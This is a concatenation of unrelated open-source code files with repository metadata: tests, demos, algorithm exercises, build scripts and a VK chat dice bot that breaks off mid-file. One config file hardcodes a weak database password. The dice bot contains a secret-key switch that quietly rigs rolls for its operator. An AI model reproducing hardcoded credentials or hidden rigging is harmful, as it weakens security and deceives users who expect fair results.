# ensure all processes exit cleanly
def test_clean_exit(self):
HARDWARE.set_power_save(False)
manager.manager_prepare()
for p in ALL_PROCESSES:
managed_processes[p].start()
time.sleep(10)
for p in reversed(ALL_PROCESSES):
state = managed_processes[p].get_process_state_msg()
self.assertTrue(state.running, f"{p} not running")
exit_code = managed_processes[p].stop(retry=False)
if (TICI and p in ['ui', 'navd']) or (EON and p == 'logcatd'):
# TODO: make Qt UI exit gracefully
continue
# Make sure the process is actually dead
managed_processes[p].stop()
# TODO: interrupted blocking read exits with 1 in cereal. use a more unique return code
exit_codes = [0, 1]
if managed_processes[p].sigkill:
exit_codes = [-signal.SIGKILL]
assert exit_code in exit_codes, f"{p} died with {exit_code}"
if __name__ == "__main__":
unittest.main()
| [
"user@comma.ai"
] | user@comma.ai |
bbc1a65be81c8caa800af962fadf22eb932c5f5a | 8387016f05a5b05eec3635800265e1e3bdbd8d14 | /scripts/getAccount.py | c637d2f93ff04b8c806a4ab8aaae659e9ed224f2 | [] | no_license | zbcoding/eth-rock-paper-scissors | 8e37369ce8eb4413714165bce88936c6355162ec | 1234080496b8b9ad96c003e5da70994826964cfa | refs/heads/master | 2023-06-30T11:34:07.754380 | 2021-07-29T03:20:33 | 2021-07-29T03:20:33 | 389,856,441 | 0 | 0 | null | 2021-07-28T04:21:38 | 2021-07-27T05:11:36 | Solidity | UTF-8 | Python | false | false | 533 | py | from brownie import accounts, config, network
LOCAL_BLOCKCHAIN_ENVIRONMENTS =\
[
"mainnet-fork",
"binance-fork",
"matic-fork",
"development",
"ganache",
"hardhat",
]
def get_account(index=None, id=None):
if index:
return accounts[index]
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
return accounts[0]
if id:
return accounts.load(id)
if network.show_active() in config["networks"]:
return accounts.add(config["wallets"]["from_key"])
return None | [
"uszagb@gmail.com"
] | uszagb@gmail.com |
32e7dcd514ef5655eeb8122a23a32cd7536044b4 | aee3a24b46ec5a3c994f797d010888a4fac4fb14 | /tk1/rosdji_sdk/build/Onboard-SDK-ROS-3.1/dji_sdk_read_cam/catkin_generated/pkg.develspace.context.pc.py | 326a8aec68aa3e1f86849a839e0c87bbd5a08705 | [] | no_license | raj-chinagundi/UAV_Detection_And_Tracking_System | 5a9b94fa299dd0461fa88745e2851675d2484331 | 76fa91a79f2ce9bd0d5e76edc7ef9e407f826d28 | refs/heads/master | 2022-11-17T13:20:33.190025 | 2018-05-19T00:17:10 | 2018-05-19T00:17:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "dji_sdk_read_cam"
PROJECT_SPACE_DIR = "/home/ubuntu/cc/rosdji_sdk/devel"
PROJECT_VERSION = "0.0.0"
| [
"amosliu19931003@gmail.com"
] | amosliu19931003@gmail.com |
eda73bba7d9036a00f9545a91aef07d96c8bece0 | 6fe8cf62f157672715fae94af6cfae08432d826d | /word_game.py | a0e950b51dfba95ad5a480f8d4927a8f7ad86d40 | [] | no_license | monergeim/python | 20c7268d5edf397c329532f61d759c6fc342ead6 | 2c504fca506a0c38b3b69f48d0e211bb5479ab9d | refs/heads/master | 2021-06-24T23:04:09.295166 | 2021-03-22T21:52:54 | 2021-03-22T21:52:54 | 185,149,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | def playHand(hand, wordList, n):
tscore = 0
updhand = hand.copy()
while calculateHandlen(updhand) > 0:
print "Current Hand: ",
for key in updhand:
if updhand[key] > 0:
for c in range(updhand[key]):
print key,
i = raw_input("\nEnter word, or a \".\" to indicate that you are finished: ")
if i == ".": #sometimes not so useful condition better if i < 2:
print "Goodbye!",
break
else:
if isValidWord(i, updhand, wordList) == False:
print "Invalid word, please try again.\n"
else:
wscore = getWordScore(i, n)
tscore += wscore
print "\"" + i + "\"" + " earned " + str(wscore) + " points. Total: " + str(tscore) + " points\n"
updhand = updateHand(updhand, i)
if calculateHandlen(updhand) == 0:
print "Run out of letters. ",
break#maybe not required
print "Total score: " + str(tscore) + " points." | [
"noreply@github.com"
] | monergeim.noreply@github.com |
c1b0f7f28604c6d4a41be1979fa72c9cea282093 | 1174123ceab7ac68368e45fbcae7059a8ad34d6a | /tornado_strong/conf/baseConf.py | 3a22a6fab24585819fb19d67d5e36a7cb16d1073 | [] | no_license | sushe2111/strong | a3a72f109adfc765ec1611903f7ad4cc0e3c88be | db9b0c243612c38fd99bccce289d190e5fbc8cb3 | refs/heads/master | 2020-03-25T07:59:12.279495 | 2018-08-13T13:50:18 | 2018-08-13T13:50:18 | 143,591,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | ListenConf = { "host":"10.5.173.248",
"port":8001 }
DatabaseConf = { "host":"127.0.0.1",
"port":3366,
"user":"root",
"password":"123456",
"dbName":"strong" }
TemplatePath = "resource/template"
StaticPath = "resource/static"
| [
"sushe2111@163.com"
] | sushe2111@163.com |
d41b5616d60c9b00c657ff8693c25553ab9bcc51 | 1ec842f6d220f2c93fcec1cddd5ecf9e1e00880b | /problems/capture_test.py | d04fb75c6195df9026f0def62f48c196fe86563d | [] | no_license | icmeyer/dahlia | 474a61212b10875d3a88aaeec850b38582c4a0b3 | f469c5f2508adae2494bdc72dd4cd9b8a5292cb8 | refs/heads/master | 2020-04-27T15:35:46.913747 | 2019-04-02T03:32:06 | 2019-04-02T03:32:06 | 174,452,258 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | import numpy as np
import sys; sys.path.append('..')
from main import main_function
from plotting import concentration_plot
isotopes = ['922390', '932390', '942390' ]
conc = np.array([1, 1, 1])
flux = 0
years = 2/365
steps = 80
reactor_type = 'fast'
conc_over_time = main_function(isotopes, conc, flux, reactor_type, years, steps)
concentration_plot(isotopes, years, steps, conc_over_time)
| [
"icmeyer@mit.edu"
] | icmeyer@mit.edu |
e9b489fbe7bcefc73ede80c24b77411fb4f7420a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03074/s376018744.py | 6c1333af062b79293eb7a34cac4974521523f39a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | """
keyword: 累積和
"""
import sys
sys.setrecursionlimit(10**6)
n, k = map(int, input().split())
s = input()
nums = []
now = 1 # 今見ている数
cnt = 0 # nowがいくつ並んでいるか
for i in range(n):
if s[i] == str(now):
cnt += 1
else:
nums.append(cnt)
now ^= 1 # 0と1を切り替える
cnt = 1 # 新しいのをカウント
if cnt != 0:
nums.append(cnt)
# 1-0-1-0-1-0-1って感じの配列が欲しい
# 1-0-1-0みたいに0で終わっていたら、適当に1つ足す
# 補足:1-0-1-0-1というのは、1が0個、0が2個、1が1個、、、などと並んでいるという意味。このとき1つ目の0をひっくり返すと1-1-1と連続する。1-...-1と連続している数が求める値なので、左端と右端は1にしたい
if len(nums)%2 == 0:
nums.append(0)
add = 2*k+1
# 累積和を作る
tot = [0]*(len(nums)+1)
for i in range(len(nums)):
tot[i+1] = tot[i]+nums[i]
ans = 0
# 1-0-1...の、1から始まり1で終わる範囲を見るので、偶数番目だけ見る
for i in range(0, len(nums), 2):
# 次のleft, rightを計算する
left = i
right = min(i+add, len(nums))
tmp = tot[right] - tot[left]
ans = max(tmp, ans)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
879e52dfed4ab37d1d10a4a98b12823d8d3bea69 | 6ae69280ab321bf0216b898c8ff163b56ffb56b8 | /venv/Scripts/easy_install-3.6-script.py | 9f89ae8d15b482a705245dea236dc4a3a1ef6071 | [] | no_license | jvdbatista/Calculadora-Declarativa | e3894072d630b877bd94d50d8701c2f83955e9f0 | 41096b05030fe9192df10cbfabcc03b4d02b0297 | refs/heads/master | 2020-03-27T06:37:58.298370 | 2018-08-25T19:00:59 | 2018-08-25T19:00:59 | 146,121,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!C:\Users\jvdba\Desktop\pd\Trabalho\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"joaodantas@softeam.com.br"
] | joaodantas@softeam.com.br |
a7e8dc33edeab6c5b14100dc09c22b6a3a0672df | 6722285224d01a5715dded488a20fdffad0e6bed | /algo/084_Largest_Rectangle_In_Histogram/Q084.py | cdcd7085993d4b9b55c99503d0547d99fcad2764 | [] | no_license | dionwang88/lc1 | 0ce1b82e7884ea7d5236e89994785cbd44afb9d5 | 54191d08bc42e5b1d403246a7486fca69d9ae30b | refs/heads/master | 2021-07-08T11:39:49.028652 | 2017-09-28T00:02:21 | 2017-09-28T00:02:21 | 105,079,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,983 | py | class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
brute force solution
"""
if not heights:
return 0
if len(heights) == 1:
return heights[0]
localMax, globalMax = heights[0], heights[0]
for i in xrange(1, len(heights)):
length = 1
localMax = heights[i]
localMin = heights[i]
for j in xrange(i - 1, -1, -1):
localMin = min(localMin, min(heights[j + 1], heights[j]))
length += 1
localMax = max(localMin * length, localMax)
globalMax = max(globalMax, localMax)
return globalMax
def largestRectangleArea1(self, heights):
# 首先 主体思路就是对于每个bar 我们都去求出以当前的bar为最低的bar的面积 然后所有这些面积的最大值就是结果
# 在求以当前bar为最低bar的面积的时候 最难的就是要确定这个最低bar的左边界还有右边界
# stack解法就是巧妙地解决了这个问题
# 最重要的 stack里存的是索引 不是值
# stack里存的的都是递增的序列 如果碰到小于栈顶的 那么 就计算栈顶的元素的面积 这个元素的面积
# 左边界就是它自己 右边界就是这个小于它的元素 然后弹出 然后如果栈顶的还是大 那么继续计算
# 因为存的是索引 所以宽度计算都是正确的
#
# 1) Create an empty stack.
# 2) Start from first bar, and do following for every bar ‘hist[i]’ where ‘i’ varies from 0 to n-1.
# ……a) If stack is empty or hist[i] is higher than the bar at top of stack, then push ‘i’ to stack.
# ……b) If this bar is smaller than the top of stack, then keep removing the top of stack while top of the stack is greater.
# Let the removed bar be hist[tp]. Calculate area of rectangle with hist[tp] as smallest bar.
# For hist[tp], the ‘left index’ is previous (previous to tp) item in stack and ‘right index’ is ‘i’ (current index).
# 3) If the stack is not empty, then one by one remove all bars from stack and do step 2.b for every removed bar.
#
# Create an empty stack. The stack holds indexes of hist[] array
# The bars stored in stack are always in increasing order of their heights.
stack = []
max_area = 0 # Initalize max area
tp = 0 # To store top of stack
area_with_top = 0 # To store area with top bar as the smallest bar
i = 0
# Run through all bars of given histogram
while i < len(heights):
# If this bar is higher than the bar on top stack, push it to stack
if len(stack) == 0 or heights[stack[-1]] <= heights[i]:
stack.append(i)
i += 1
# If this bar is lower than top of stack, then calculate area of rectangle
# with stack top as the smallest (or minimum height) bar. 'i' is
# 'right index' for the top and element before top in stack is 'left index'
else:
tp = stack.pop()
# Calculate the area with hist[tp] stack as smallest bar
minBar = i if len(stack) == 0 else i - stack[-1] -1
area_with_top = heights[tp] * minBar
# update max area, if needed
max_area = max(max_area, area_with_top)
# Now pop the remaining bars from stack and calculate area with every popped bar as the smallest bar
while len(stack) > 0:
tp = stack.pop()
minBar = i if len(stack) == 0 else i - stack[-1] - 1
area_with_top = heights[tp] * minBar
max_area = max(max_area, area_with_top)
return max_area
sol = Solution()
print sol.largestRectangleArea1([2,1,5,6,2,3])
| [
"qwang8@ebay.com"
] | qwang8@ebay.com |
cc816476b8edf8aced316ed2ed77aaffef1ab329 | 792f0bb391d9d8a612908598131a980d5a5a8698 | /chapter8 additional 4.py | 04ca9eb464739e77d2ca30b09b50e2ea098a7695 | [] | no_license | Dr-Waffle19/CIS1415 | ccbb7d0ea81e8cce2531a6596c660764b285c879 | 43f243208b1d7953a7c38b4e6dd10d95c52a0588 | refs/heads/master | 2020-03-29T15:05:07.623195 | 2018-11-14T04:04:10 | 2018-11-14T04:04:10 | 150,043,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,218 | py | Student_grade = {
'Jimoh Olu': {
'test_labwork_homeworks': [87, 91, 68],
'Midterm': 80,
'Final': 91
},
'Taju Kulu': {
'test_labwork_homeworks': [99, 78.25],
'Midterm': 87,
'Final': 75
},
'Bunmi Ojo': {
'test_labwork_homeworks': [98.75, 80],
'Midterm': 40,
'Final': 75
},
}
user_input = input('Enter student full name: ')
while user_input != 'exit':
if user_input in Student_grade:
# Get values from the inputed nested dictionary
test_labwork_homeworks = Student_grade[user_input]['test_labwork_homeworks']
midterm = Student_grade[user_input]['Midterm']
final = Student_grade[user_input]['Final']
# print information about student grade
for hw, score in enumerate(test_labwork_homeworks):
print('Homework %d: %d' % (hw, score))
print('Midterm: %s' % midterm)
print('Final: %s' % final)
# student total grade
total_points = sum([i for i in test_labwork_homeworks]) + midterm + final
print('Final percentage: %f%%' % (100*(total_points / 500.0)))
user_input = input('Enter student full name: ')
| [
"noreply@github.com"
] | Dr-Waffle19.noreply@github.com |
5d306e2738144841d68830c40dc1f04facfda53c | 4a56b5b738a88b04ff126f1dab8ff4c7baa128c1 | /61/61.py | 999374082e00ebb65cbbc3189a6338386e803fcc | [
"Unlicense"
] | permissive | vladcto/ACMP_Answers | ff6c7ba17833e33ad4bd5a97e494fef81f09751f | bc163068d7b27c5241f995da3f58a1f8c623d460 | refs/heads/master | 2022-06-16T21:15:43.026138 | 2022-06-06T18:53:29 | 2022-06-06T18:53:29 | 239,358,048 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | score = 0 # Перевес очков в какую-то команду
for i in range(0,4):
inp = input().split(" ")
score+=int(inp[0])
score-=int(inp[1])
if score==0:
print("DRAW")
else:
if score>0:
print(1)
else:
print(2)
| [
"razrab.ytka@gmail.com"
] | razrab.ytka@gmail.com |
4137b4b2fb73ef4a4cd1062ff1efe5241f4b7b91 | c5393c8558bf819bf9883583e464c364156a3cd5 | /samples/demo.py | c0686b021efa779b2f8d04bc74651e347f063f99 | [
"MIT"
] | permissive | a13544835729/Mask_RCNN | ec839e4761a628bb188f307e809e4a58ae4afd0b | c1170dc4a69b75465bd9ee14e08112e5c21431de | refs/heads/master | 2023-07-10T22:56:00.714114 | 2021-08-23T12:00:31 | 2021-08-23T12:00:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,057 | py | #!/usr/bin/env python
# coding: utf-8
# # Mask R-CNN Demo
#
# A quick intro to using the pre-trained model to detect and segment objects.
# In[1]:
import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
# Import COCO config
sys.path.append(os.path.join(ROOT_DIR, "samples/coco/")) # To find local version
import coco
#get_ipython().run_line_magic('matplotlib', 'inline')
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
# Directory of images to run detection on
IMAGE_DIR = os.path.join(ROOT_DIR, "images")
# ## Configurations
#
# We'll be using a model trained on the MS-COCO dataset. The configurations of this model are in the ```CocoConfig``` class in ```coco.py```.
#
# For inferencing, modify the configurations a bit to fit the task. To do so, sub-class the ```CocoConfig``` class and override the attributes you need to change.
# In[2]:
class InferenceConfig(coco.CocoConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# ## Create Model and Load Trained Weights
# In[3]:
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# ## Class Names
#
# The model classifies objects and returns class IDs, which are integer value that identify each class. Some datasets assign integer values to their classes and some don't. For example, in the MS-COCO dataset, the 'person' class is 1 and 'teddy bear' is 88. The IDs are often sequential, but not always. The COCO dataset, for example, has classes associated with class IDs 70 and 72, but not 71.
#
# To improve consistency, and to support training on data from multiple sources at the same time, our ```Dataset``` class assigns it's own sequential integer IDs to each class. For example, if you load the COCO dataset using our ```Dataset``` class, the 'person' class would get class ID = 1 (just like COCO) and the 'teddy bear' class is 78 (different from COCO). Keep that in mind when mapping class IDs to class names.
#
# To get the list of class names, you'd load the dataset and then use the ```class_names``` property like this.
# ```
# # Load COCO dataset
# dataset = coco.CocoDataset()
# dataset.load_coco(COCO_DIR, "train")
# dataset.prepare()
#
# # Print class names
# print(dataset.class_names)
# ```
#
# We don't want to require you to download the COCO dataset just to run this demo, so we're including the list of class names below. The index of the class name in the list represent its ID (first class is 0, second is 1, third is 2, ...etc.)
# In[4]:
# COCO Class names
# Index of the class in the list is its ID. For example, to get ID of
# the teddy bear class, use: class_names.index('teddy bear')
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
# ## Run Object Detection
# In[5]:
# Load a random image from the images folder
file_names = next(os.walk(IMAGE_DIR))[2]
image = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))
# Run detection
results = model.detect([image], verbose=1)
# Visualize results
r = results[0]
visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],
class_names, r['scores'])
# In[ ]:
| [
"issaclin32@gmail.com"
] | issaclin32@gmail.com |
1ab67da7a68a8a067bf849928740d2d0ebfd5c08 | 056d971ce27d505ab3c8905dcbd120556944b64b | /backend/scrapebookmain/manage.py | 03490de307efc043f71bd342b45f25e0e9b3b693 | [] | no_license | karan8891/Capstone | d9177e894a43a863d66792fd586ec02eb475aee4 | 88ccdab1cdf0366aba236776391ac7a9d6625fe3 | refs/heads/master | 2023-01-07T15:03:40.930225 | 2020-07-11T01:07:21 | 2020-07-11T01:07:21 | 238,735,127 | 0 | 0 | null | 2023-01-07T14:49:44 | 2020-02-06T16:38:16 | TypeScript | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'scrapebook.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"55722488+karan8891@users.noreply.github.com"
] | 55722488+karan8891@users.noreply.github.com |
f2f47e2eae79b2c3ca8681c79deb4f957d42216c | 80c6e6e940af2c4e5ad7e4c2585a0fa017a487e7 | /ru/tts1/local/clean_text.py | 1eb93604f091dc184344e59543936f69517955db | [] | no_license | d18n/ru-tts | ce4ce8f3e7d2d41f6bfa151a7223814ea2664a3b | 6ac369249dae739b57f04778d6a6568fa238c7aa | refs/heads/master | 2022-07-01T21:23:13.218917 | 2020-05-11T13:26:28 | 2020-05-11T13:26:28 | 261,098,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | #!/user/bin/env python3
import os
import argparse
import codecs
from pathlib import Path
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("in_text", type=str, help="text to be cleaned")
parser.add_argument("out_text", type=str, help="text to be cleaned")
args = parser.parse_args()
with codecs.open(args.in_text, "r", "utf-8") as f_in, codecs.open(args.out_text, "w", "utf-8") as f_out:
for line in f_in.readlines():
id, content, _, duration = line.split("|")
id = Path(id).stem
# for now, I don't think we'll need to clean anything, but if we ever want to someday use the regular latin alphabet instead of cyrillic, it can be implemented here
f_out.write("%s %s\n" % (id, content)) | [
"dev.18n@gmail.com"
] | dev.18n@gmail.com |
77b8f2f2c93064c713fc795f1d1bc59e6d4955aa | 002f1d50850e9df9ba2c12a498ae03f8b6c563d7 | /setup.py | de63746d0d3511852b9f902b2857f9d7e52cbdfe | [
"MIT"
] | permissive | aman2457/Linked_List | 0edf1f0e49eefc0636e1f24f3cc6cabffc205b19 | d85001b80b4c23d1bae3379a5173fd5ca061380d | refs/heads/master | 2023-04-15T05:35:33.548195 | 2021-04-23T05:21:55 | 2021-04-23T05:21:55 | 360,039,284 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,193 | py | from setuptools import setup
def readme():
with open('README.md') as f:
README = f.read()
return README
setup(
name = "py_linked_list",
version = "0.0.1",
description = "A Python package which contains some methods to manipulate a linked List.",
long_description = readme(),
long_description_content_type = "text/markdown",
url = "https://github.com/aman2457/Linked_List",
download_url = "https://github.com/aman2457/Linked_List/archive/refs/heads/main.zip",
author = "Aman Kumar",
author_email = "amankumar84349@gmail.com",
license = "MIT",
keywords = ["linked list", "list", "python linked list"],
classifiers = [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Science/Research',
],
py_modules = ["Linked_List"],
package_dir = {'': 'src'},
include_package_data = True,
install_requires = [],
) | [
"amankumar84349@gmail.com"
] | amankumar84349@gmail.com |
1c041b692291128038daa8cc0598ddf1f15b71e7 | 980c922e73579202445a03219c7c04c393c30c78 | /视频演示代码/test/demo_face_recognize.py | ec8c23a8581f73c4debc10abd0491e3f3a4b4bf8 | [] | no_license | Yorkzhang19961122/HCI-system-for-ASD | 5a186c5fbfe0b58712df862362d09f150dac6496 | 16dea0b4ae3ececbf55819b408f3e0df3a6697e6 | refs/heads/main | 2023-03-27T08:16:30.492543 | 2021-03-11T06:23:03 | 2021-03-11T06:23:03 | 346,596,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,076 | py | import asyncio
from mini.apis.api_observe import ObserveFaceRecognise
from mini.apis.api_sound import PlayTTS
from mini.dns.dns_browser import WiFiDevice
from mini.pb2.codemao_facerecognisetask_pb2 import FaceRecogniseTaskResponse
from test_connect import test_connect, shutdown
from test_connect import test_get_device_by_name, test_start_run_program
# 测试, 检测到注册的人脸,则上报事件, 如果陌生人,返回"stranger"
async def test_ObserveFaceRecognise():
"""人脸识别demo
监听人脸识别事件,机器人上报识别到的人脸信息(数组)
如果是已注册的人脸,返回人脸详细信息:id,名字,性别,年龄
如果是陌生人,返回 name: "stranger"
当成功识别到人脸后,停止监听,播报"你好,xxx"(xxx为人脸信息中的name)
"""
observer: ObserveFaceRecognise = ObserveFaceRecognise()
# FaceRecogniseTaskResponse.faceInfos: [FaceInfoResponse]
# FaceInfoResponse.id, FaceInfoResponse.name,FaceInfoResponse.gender,FaceInfoResponse.age
# FaceRecogniseTaskResponse.isSuccess
# FaceRecogniseTaskResponse.resultCode
def handler(msg: FaceRecogniseTaskResponse):
print(f"{msg}")
if msg.isSuccess and msg.faceInfos:
observer.stop()
asyncio.create_task(__tts(msg.faceInfos[0].name))
observer.set_handler(handler)
observer.start()
await asyncio.sleep(0)
async def __tts(name):
await PlayTTS(text=f'你好, {name}').execute()
asyncio.get_running_loop().run_in_executor(None, asyncio.get_running_loop().stop)
if __name__ == '__main__':
device: WiFiDevice = asyncio.get_event_loop().run_until_complete(test_get_device_by_name())
if device:
asyncio.get_event_loop().run_until_complete(test_connect(device))
asyncio.get_event_loop().run_until_complete(test_start_run_program())
asyncio.get_event_loop().run_until_complete(test_ObserveFaceRecognise())
asyncio.get_event_loop().run_forever()
asyncio.get_event_loop().run_until_complete(shutdown())
| [
"15257379410@163.com"
] | 15257379410@163.com |
d2cc35b1df23ef29af004eb261a814821550e415 | 2b3fffed97ce27798cfbca24d1fb2fd6e278f3e0 | /start.py | 5449d7b3cc7efe9761e719464518380ffcc59beb | [] | no_license | sofiered/vk-dicebot-lina | c6af83b3dcf8b87ab087f5cd2d6a435a9b0689dd | ff94294346809354e25fc8c9b8525e730092ef88 | refs/heads/master | 2021-05-11T09:44:19.082527 | 2018-09-04T13:57:46 | 2018-09-04T13:57:46 | 118,085,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,805 | py | import asyncio
from app.bot import Bot2
import random
import re
import functools
import os
from itertools import chain
loop = asyncio.get_event_loop()
dice_regexp = r'(\d+)[d|д|к](\d+)\s*([\+|-]\d+)?'
interval_regexp = r'от\s*(\d+)\s*до\s*(\d+)?'
bot_names = ('бот', 'лина', 'народ')
peachy_ids = range(49,97)
rumka_ids = range(5582, 5630)
misti_ids = range(5701, 5745)
seth_ids = range(6109,6156)
lovely_ids = range(7096,7143)
cats_id = [cat for cat in chain(peachy_ids,
rumka_ids,
misti_ids,
seth_ids,
lovely_ids)]
def message_to_bot(func):
async def decorated_func(message):
text = message['message'].lower()
if text.startswith(bot_names):
await func(message, text)
return decorated_func
async def main():
if 'HEROKU_APP' in os.environ:
login = os.environ.get('LOGIN', '')
password = os.environ.get('PASSWORD', '')
secret_key = os.environ.get('SECRET_KEY')
admin_key = int(os.environ.get('ADMIN_KEY'))
else:
import local_settings
login = local_settings.LOGIN
password = local_settings.PASSWORD
secret_key = local_settings.SECRET_KEY
admin_key = local_settings.ADMIN_KEY
bot = await Bot2.create(login, password, loop)
def admin_only(func):
async def decorated_func(message):
if message['speaker'] == admin_key:
await func(message)
return decorated_func
@message_to_bot
async def cheat_switcher(message, text):
if secret_key in text:
bot.cheat_switch()
await bot.send_message(answer_to=message,
text=str(bot.is_cheating))
@message_to_bot
async def dice_roller(message, text):
parse_result = re.findall(dice_regexp, text)
cheat = bool('ч' in text and bot.is_cheating)
if 'дайс' in text:
await bot.send_message(answer_to=message,
text='D20: {}'.format(
random.SystemRandom().randint(1, 20) if not cheat else 20))
elif parse_result:
amount, dice, modifier = map(lambda x: int(x) if x else 0,
parse_result[0])
print("{} {} {}".format(amount, dice, modifier))
if amount > 1000 or dice > 1000:
await bot.send_message(message, "Ты наркоман? Зачем тебе столько?")
return
if amount < 1:
await bot.send_message(message, 'Зачем бросать дайс менее одного раза?')
return
if dice < 1:
await bot.send_message(message, "Я не умею бросить {}-сторонний дайс".format(dice))
return
dice_pool = [random.SystemRandom().randint(1, dice)
if not cheat else dice for _ in range(amount)]
await bot.send_message(
message,
'({}){} = {}'.format(
' + '.join(map(str, dice_pool)),
(str(modifier) if modifier < 0 else '+{}'.format(modifier))
if modifier else '',
functools.reduce(lambda x, y: x + y,
dice_pool) + modifier))
@message_to_bot
async def who_is_chosen(message, text):
if 'кто избран' in text:
chosen_one = (
random.choice(
list(
filter(
lambda x: x.get('id') != bot.get_account_id(),
await bot.get_chat_users(message['sender'])
)
)
)
)
await bot.send_message(answer_to=message,
text='{} {}, ты избран!'.format(
chosen_one.get('first_name'),
chosen_one.get('last_name')
))
@message_to_bot
async def where_is_posts(message, text):
posts_answers = [
'Сегодня будет, но позже',
'Я уже пишу',
'Вечером',
'Я хз, что писать',
'Вдохновения нет((('
]
if 'посты' in text:
await bot.send_message(answer_to=message,
text=random.choice(posts_answers))
@message_to_bot
async def send_cat(message, text):
if 'мяу' in text:
await bot.send_sticker(answer_to=message,
sticker_id=random.choice(cats_id))
@message_to_bot
async def get_advice(message, text):
want_advice = ('что делать', 'как быть', 'посоветуй', 'дай совет')
advices = [
'Если ты проявишь инициативу, успех не заставит себя ждать',
'Твои надежды и планы сбудутся сверх всяких ожиданий',
'Кто-то старается помешать или навредить тебе',
'Будь осторожен: тебя хотят обмануть!',
'Ты надеешься не напрасно!',
'Проблема внутри тебя',
'Сядь и осмотрись',
'Ты идешь не туда, надо было поворачивать налево!',
'Это ещё не все что с тобой сегодня случится',
'Хватит крутиться вокруг мира',
'Пора попросить помощи у друга',
'Нужно запастись ресурсами и построить Зиккурат',
'Время постоять в сторонке и обдумать',
'Мыслишь верно, но не так',
